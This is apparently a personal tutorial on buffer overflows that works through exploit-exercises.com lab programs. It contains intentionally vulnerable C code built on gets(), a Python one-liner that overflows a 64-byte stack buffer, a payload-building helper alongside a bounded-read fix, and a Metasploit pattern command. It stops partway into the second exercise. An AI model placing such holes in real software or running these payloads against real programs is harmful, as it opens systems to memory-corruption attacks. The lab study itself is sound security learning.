To get a better grasp of buffer overflows I decided to work through and document some exercises on the topic.
The exploit exercises are mainly from exploit-exercises.com.
Stack overflow - when the execution stack grows beyond the memory that is reserved for it.
Buffer overflow - when a program writes beyond the end of the memory allocated for a buffer (heap or stack).
I will use Kali Linux and the checksec script.
To compile 32-bit binaries on a 64-bit Kali instance, install the dependencies:
apt-get install gcc-multilib
and compile with the additional flag:
gcc -m32 -o [Output] [Input]
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
    volatile int modified;   /* sits above buffer on the stack, so an overflow reaches it */
    char buffer[64];
    modified = 0;
    gets(buffer);            /* no length limit: input longer than 64 bytes overflows buffer */
    printf("%x\n", modified);
    if(modified != 0) {
        printf("you have changed the 'modified' variable\n");
    } else {
        printf("Try again?\n");
    }
    return 0;
}
First compile the program with
gcc -o stack0 stack0.c
The buffer is 64 bytes; if you supply more than 64 bytes, the buffer will overflow.
The printf shows us the bytes of our input that overwrote the modified variable.
This output appears reversed because Intel CPUs store integers in little-endian byte order.
If we input this:
python -c 'print "A"*76 + "123456789"' | ./stack0
Python prints "A" (ASCII 0x41) 76 times and then appends "123456789".
The output of the program looks like this:
34333231
you have changed the 'modified' variable
The first line is the modified variable, which now contains "1234",
shown as ASCII byte values in little-endian order:
4 = 34
3 = 33
2 = 32
1 = 31
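To make the byte order and the fix concrete, here is an added example (not part of the original exercise code) that builds the same 76-A payload, decodes the four bytes that land on modified the way an x86 CPU would, and shows a bounded read that keeps the 64-byte buffer intact; the offset 76 is taken from the page's run and depends on the compiler's stack layout.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed payload: the bytes the page pipes into stack0,
 * 76 x 'A' followed by "123456789". Returns its length. */
size_t build_payload(char *dst, size_t cap)
{
    const char tail[] = "123456789";
    size_t n = 76 + strlen(tail);
    if (cap < n + 1) return 0;
    memset(dst, 'A', 76);
    memcpy(dst + 76, tail, strlen(tail) + 1);
    return n;
}

/* Assemble 4 bytes into a 32-bit value in little-endian order,
 * exactly as the CPU reads 'modified' after the overflow. */
uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Bounded replacement for gets(buffer): copies at most cap-1 bytes,
 * stops at a newline, always NUL-terminates. Returns 1 if input was
 * cut off, 0 otherwise. fgets(buffer, cap, stdin) gives the same
 * guarantee on a real stream. */
int bounded_read(char *dst, size_t cap, const char *src)
{
    size_t i = 0;
    while (i + 1 < cap && src[i] != '\0' && src[i] != '\n') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return src[i] != '\0' && src[i] != '\n';
}

int main(void)
{
    char payload[128], buffer[64];
    size_t len = build_payload(payload, sizeof payload);
    /* Bytes 76..79 of the payload are "1234": the page's 34333231. */
    printf("%zu bytes, modified would read %x\n", len,
           le32((const unsigned char *)payload + 76));
    int cut = bounded_read(buffer, sizeof buffer, payload);
    printf("bounded read kept %zu bytes, truncated=%d\n", strlen(buffer), cut);
    return 0;
}
```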
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()                   /* never called by main; reached only if control flow is redirected */
{
    printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);            /* unbounded read: input past 64 bytes overwrites the saved stack data */
    return 0;
}
Create a unique pattern to see at which offset you are overwriting RDI.
msf-pattern_create -l 120